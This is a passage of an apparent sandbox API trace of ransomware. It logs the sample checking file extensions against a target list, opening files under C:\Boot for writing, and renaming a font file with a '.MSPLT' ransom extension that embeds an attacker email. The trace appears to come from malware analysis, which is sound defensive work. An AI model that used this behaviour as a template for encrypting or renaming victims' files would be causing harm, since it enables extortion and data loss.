lpString2=".mui") returned -1 [0285.372] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0285.373] lstrlenW (lpString=".1cd") returned 4 [0285.373] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.373] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0285.373] lstrlenW (lpString=".jpg") returned 4 [0285.373] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.373] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0285.373] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0285.373] lstrlenW (lpString=".doc") returned 4 [0285.373] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.373] lstrlenW (lpString=".docx") returned 5 [0285.373] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.373] lstrlenW (lpString=".pdf") returned 4 [0285.373] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.373] lstrlenW (lpString=".xls") returned 4 [0285.373] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.373] lstrlenW (lpString=".xlsx") returned 5 [0285.373] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.373] lstrlenW (lpString=".ppt") returned 4 [0285.373] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.373] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0285.373] lstrlenW (lpString=".zip") returned 4 [0285.373] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.373] lstrlenW (lpString=".rar") returned 4 [0285.373] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.373] lstrlenW (lpString=".bz2") returned 4 [0285.373] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.373] lstrlenW (lpString=".7z") returned 3 [0285.374] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.374] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0285.374] lstrlenW (lpString=".dbf") returned 4 [0285.374] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.374] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0285.374] lstrlenW (lpString=".1cd") returned 4 [0285.374] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.374] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0285.374] lstrlenW (lpString=".jpg") returned 4 [0285.374] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.374] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0285.374] lstrlenW (lpString="memtest.exe.mui") returned 15 [0285.374] CreateFileW (lpFileName="C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0285.374] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=45984) returned 1 [0285.374] CloseHandle (hObject=0x3b4) returned 1 [0285.375] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui")) returned 0x20 [0285.375] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\es-es\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.375] CreateFileW (lpFileName="C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.375] lstrlenW (lpString="C:\\Boot\\es-ES\\memtest.exe.mui") returned 29 [0285.375] lstrlenW (lpString="C:\\Boot\\es-ES\\memtest.exe.mui") returned 29 [0285.375] lstrlenW (lpString=".doc") returned 4 [0285.375] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.375] lstrlenW (lpString=".docx") returned 5 [0285.375] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.375] lstrlenW (lpString=".pdf") returned 4 [0285.375] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.375] lstrlenW (lpString=".xls") returned 4 [0285.375] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.375] lstrlenW (lpString=".xlsx") returned 5 [0285.375] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.375] lstrlenW (lpString=".ppt") returned 4 [0285.375] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.375] lstrlenW (lpString="C:\\Boot\\es-ES\\memtest.exe.mui") returned 29 [0285.375] lstrlenW (lpString=".zip") returned 4 [0285.375] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.375] lstrlenW (lpString=".rar") returned 4 [0285.376] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.376] lstrlenW (lpString=".bz2") returned 4 [0285.376] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.376] lstrlenW (lpString=".7z") returned 3 [0285.376] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.376] lstrlenW (lpString="C:\\Boot\\es-ES\\memtest.exe.mui") returned 29 [0285.376] lstrlenW (lpString=".dbf") returned 4 [0285.376] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.376] lstrlenW (lpString="C:\\Boot\\es-ES\\memtest.exe.mui") returned 29 [0285.376] lstrlenW (lpString=".1cd") returned 4 [0285.376] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.376] lstrlenW (lpString="C:\\Boot\\es-ES\\memtest.exe.mui") returned 29 [0285.376] lstrlenW (lpString=".jpg") returned 4 [0285.376] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.376] lstrlenW (lpString="C:\\Boot\\es-ES\\memtest.exe.mui") returned 29 [0285.376] lstrlenW (lpString="C:\\Boot\\es-ES\\memtest.exe.mui") returned 29 [0285.376] lstrlenW (lpString=".doc") returned 4 [0285.376] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.376] lstrlenW (lpString=".docx") returned 5 [0285.376] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.376] lstrlenW (lpString=".pdf") returned 4 [0285.376] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.376] lstrlenW (lpString=".xls") returned 4 [0285.376] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.376] lstrlenW (lpString=".xlsx") returned 5 [0285.376] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.376] lstrlenW (lpString=".ppt") returned 4 [0285.376] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.376] lstrlenW (lpString="C:\\Boot\\es-ES\\memtest.exe.mui") returned 29 [0285.377] lstrlenW (lpString=".zip") returned 4 [0285.377] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.377] lstrlenW (lpString=".rar") returned 4 [0285.377] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.377] lstrlenW (lpString=".bz2") returned 4 [0285.377] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.377] lstrlenW (lpString=".7z") returned 3 [0285.377] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.377] lstrlenW (lpString="C:\\Boot\\es-ES\\memtest.exe.mui") returned 29 [0285.377] lstrlenW (lpString=".dbf") returned 4 [0285.377] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.377] lstrlenW (lpString="C:\\Boot\\es-ES\\memtest.exe.mui") returned 29 [0285.377] lstrlenW (lpString=".1cd") returned 4 [0285.377] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.377] lstrlenW (lpString="C:\\Boot\\es-ES\\memtest.exe.mui") returned 29 [0285.377] lstrlenW (lpString=".jpg") returned 4 [0285.377] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.377] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0285.377] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.377] CreateFileW (lpFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0285.378] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=77664) returned 1 [0285.378] CloseHandle (hObject=0x3b4) returned 1 [0285.378] GetFileAttributesW (lpFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui")) returned 0x20 [0285.378] GetFileAttributesW (lpFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.378] CreateFileW (lpFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.378] lstrlenW (lpString="C:\\Boot\\es-MX\\bootmgr.exe.mui") returned 29 [0285.378] lstrlenW (lpString="C:\\Boot\\es-MX\\bootmgr.exe.mui") returned 29 [0285.378] lstrlenW (lpString=".doc") returned 4 [0285.378] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.378] lstrlenW (lpString=".docx") returned 5 [0285.378] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.378] lstrlenW (lpString=".pdf") returned 4 [0285.378] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.378] lstrlenW (lpString=".xls") returned 4 [0285.378] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.378] lstrlenW (lpString=".xlsx") returned 5 [0285.378] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.378] lstrlenW (lpString=".ppt") returned 4 [0285.378] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.378] lstrlenW (lpString="C:\\Boot\\es-MX\\bootmgr.exe.mui") returned 29 [0285.379] lstrlenW (lpString=".zip") returned 4 [0285.379] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.379] lstrlenW (lpString=".rar") returned 4 [0285.379] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.379] lstrlenW (lpString=".bz2") returned 4 [0285.379] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.379] lstrlenW (lpString=".7z") returned 3 [0285.379] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.379] lstrlenW (lpString="C:\\Boot\\es-MX\\bootmgr.exe.mui") returned 29 [0285.379] Sleep (dwMilliseconds=0x64) [0285.700] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0285.701] CreateFileW (lpFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0285.707] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=75104) returned 1 [0285.707] CloseHandle (hObject=0x3f0) returned 1 [0285.707] GetFileAttributesW (lpFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui")) returned 0x20 [0285.707] GetFileAttributesW (lpFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.707] CreateFileW (lpFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.707] lstrlenW (lpString="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 29 [0285.707] lstrlenW (lpString="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 29 [0285.707] lstrlenW (lpString=".doc") returned 4 [0285.708] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.708] lstrlenW (lpString=".docx") returned 5 [0285.708] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.708] lstrlenW (lpString=".pdf") returned 4 [0285.708] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.708] lstrlenW (lpString=".xls") returned 4 [0285.708] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.708] lstrlenW (lpString=".xlsx") returned 5 [0285.708] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.708] lstrlenW (lpString=".ppt") returned 4 [0285.708] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.708] lstrlenW (lpString="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 29 [0285.708] lstrlenW (lpString=".zip") returned 4 [0285.708] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.708] lstrlenW (lpString=".rar") returned 4 [0285.708] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.708] lstrlenW (lpString=".bz2") returned 4 [0285.713] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.713] lstrlenW (lpString=".7z") returned 3 [0285.714] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.714] lstrlenW (lpString="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 29 [0285.714] lstrlenW (lpString=".dbf") returned 4 [0285.714] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.714] lstrlenW (lpString="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 29 [0285.714] lstrlenW (lpString=".1cd") returned 4 [0285.714] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.714] lstrlenW (lpString="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 29 [0285.714] lstrlenW (lpString=".jpg") returned 4 [0285.714] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.714] lstrlenW (lpString="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 29 [0285.714] lstrlenW (lpString="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 29 [0285.714] lstrlenW (lpString=".doc") returned 4 [0285.714] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.714] lstrlenW (lpString=".docx") returned 5 [0285.714] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.714] lstrlenW (lpString=".pdf") returned 4 [0285.715] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.715] lstrlenW (lpString=".xls") returned 4 [0285.715] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.715] lstrlenW (lpString=".xlsx") returned 5 [0285.715] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.715] lstrlenW (lpString=".ppt") returned 4 [0285.715] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.715] lstrlenW (lpString="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 29 [0285.715] lstrlenW (lpString=".zip") returned 4 [0285.715] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.715] lstrlenW (lpString=".rar") returned 4 [0285.715] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.715] lstrlenW (lpString=".bz2") returned 4 [0285.715] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.715] lstrlenW (lpString=".7z") returned 3 [0285.715] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.715] lstrlenW (lpString="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 29 [0285.715] lstrlenW (lpString=".dbf") returned 4 [0285.716] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.716] lstrlenW (lpString="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 29 [0285.716] lstrlenW (lpString=".1cd") returned 4 [0285.716] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.716] lstrlenW (lpString="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 29 [0285.716] lstrlenW (lpString=".jpg") returned 4 [0285.716] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.716] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0285.716] lstrlenW (lpString="memtest.exe.mui") returned 15 [0285.716] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0285.723] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=45472) returned 1 [0285.723] CloseHandle (hObject=0x3b0) returned 1 [0285.723] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui")) returned 0x20 [0285.723] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.723] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.724] lstrlenW (lpString="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 29 [0285.724] lstrlenW (lpString="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 29 [0285.724] lstrlenW (lpString=".doc") returned 4 [0285.724] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.724] lstrlenW (lpString=".docx") returned 5 [0285.724] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.724] lstrlenW (lpString=".pdf") returned 4 [0285.724] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.724] lstrlenW (lpString=".xls") returned 4 [0285.724] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.724] lstrlenW (lpString=".xlsx") returned 5 [0285.724] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.724] lstrlenW (lpString=".ppt") returned 4 [0285.724] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.724] lstrlenW (lpString="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 29 [0285.724] lstrlenW (lpString=".zip") returned 4 [0285.724] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.724] lstrlenW (lpString=".rar") returned 4 [0285.725] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.725] lstrlenW (lpString=".bz2") returned 4 [0285.725] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.725] lstrlenW (lpString=".7z") returned 3 [0285.725] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.725] lstrlenW (lpString="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 29 [0285.725] lstrlenW (lpString=".dbf") returned 4 [0285.725] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.725] lstrlenW (lpString="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 29 [0285.725] lstrlenW (lpString=".1cd") returned 4 [0285.725] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.725] lstrlenW (lpString="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 29 [0285.725] lstrlenW (lpString=".jpg") returned 4 [0285.726] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.726] lstrlenW (lpString="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 29 [0285.726] lstrlenW (lpString="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 29 [0285.726] lstrlenW (lpString=".doc") returned 4 [0285.726] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.726] lstrlenW (lpString=".docx") returned 5 [0285.726] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.726] lstrlenW (lpString=".pdf") returned 4 [0285.726] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.726] lstrlenW (lpString=".xls") returned 4 [0285.727] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.727] lstrlenW (lpString=".xlsx") returned 5 [0285.727] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.727] lstrlenW (lpString=".ppt") returned 4 [0285.727] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.727] lstrlenW (lpString="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 29 [0285.727] lstrlenW (lpString=".zip") returned 4 [0285.727] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.727] lstrlenW (lpString=".rar") returned 4 [0285.727] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.727] lstrlenW (lpString=".bz2") returned 4 [0285.727] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.727] lstrlenW (lpString=".7z") returned 3 [0285.727] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.727] lstrlenW (lpString="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 29 [0285.727] lstrlenW (lpString=".dbf") returned 4 [0285.727] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.727] lstrlenW (lpString="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 29 [0285.727] lstrlenW (lpString=".1cd") returned 4 [0285.727] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.727] lstrlenW (lpString="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 29 [0285.727] lstrlenW (lpString=".jpg") returned 4 [0285.727] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.728] Sleep (dwMilliseconds=0x64) [0285.966] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0285.967] lstrlenW (lpString="chs_boot.ttf") returned 12 [0285.967] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0285.969] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=3695719) returned 1 [0285.969] CloseHandle (hObject=0x3e4) returned 1 [0285.969] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0x20 [0285.969] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.969] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0285.969] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26 [0285.969] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26 [0285.969] lstrlenW (lpString=".doc") returned 4 [0285.969] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0285.969] lstrlenW (lpString=".docx") returned 5 [0285.969] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0285.969] lstrlenW (lpString=".pdf") returned 4 [0285.969] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0285.969] lstrlenW (lpString=".xls") returned 4 [0285.969] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0285.969] lstrlenW (lpString=".xlsx") returned 5 [0285.969] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0285.970] lstrlenW (lpString=".ppt") returned 4 [0285.970] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0285.970] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26 [0285.970] lstrlenW (lpString=".zip") returned 4 [0285.970] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0285.970] lstrlenW (lpString=".rar") returned 4 [0285.970] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0285.970] lstrlenW (lpString=".bz2") returned 4 [0285.970] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0285.970] lstrlenW (lpString=".7z") returned 3 [0285.970] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0285.970] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26 [0285.970] lstrlenW (lpString=".dbf") returned 4 [0285.970] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0285.970] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26 [0285.970] lstrlenW (lpString=".1cd") returned 4 [0285.970] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0285.970] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26 [0285.970] lstrlenW (lpString=".jpg") returned 4 [0285.970] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0285.970] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26 [0285.970] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26 [0285.970] lstrlenW (lpString=".doc") returned 4 [0285.970] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0285.970] lstrlenW (lpString=".docx") returned 5 [0285.970] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0285.970] lstrlenW (lpString=".pdf") returned 4 [0285.970] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0285.970] lstrlenW (lpString=".xls") returned 4 [0285.970] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0285.971] lstrlenW (lpString=".xlsx") returned 5 [0285.971] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0285.971] lstrlenW (lpString=".ppt") returned 4 [0285.971] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0285.971] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26 [0285.971] lstrlenW (lpString=".zip") returned 4 [0285.971] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0285.971] lstrlenW (lpString=".rar") returned 4 [0285.971] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0285.971] lstrlenW (lpString=".bz2") returned 4 [0285.971] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0285.971] lstrlenW (lpString=".7z") returned 3 [0285.971] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0285.971] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26 [0285.971] lstrlenW (lpString=".dbf") returned 4 [0285.971] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0285.971] lstrlenW (lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26 [0285.971] lstrlenW (lpString=".1cd") returned 4 [0285.971] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0285.971] lstrlenW 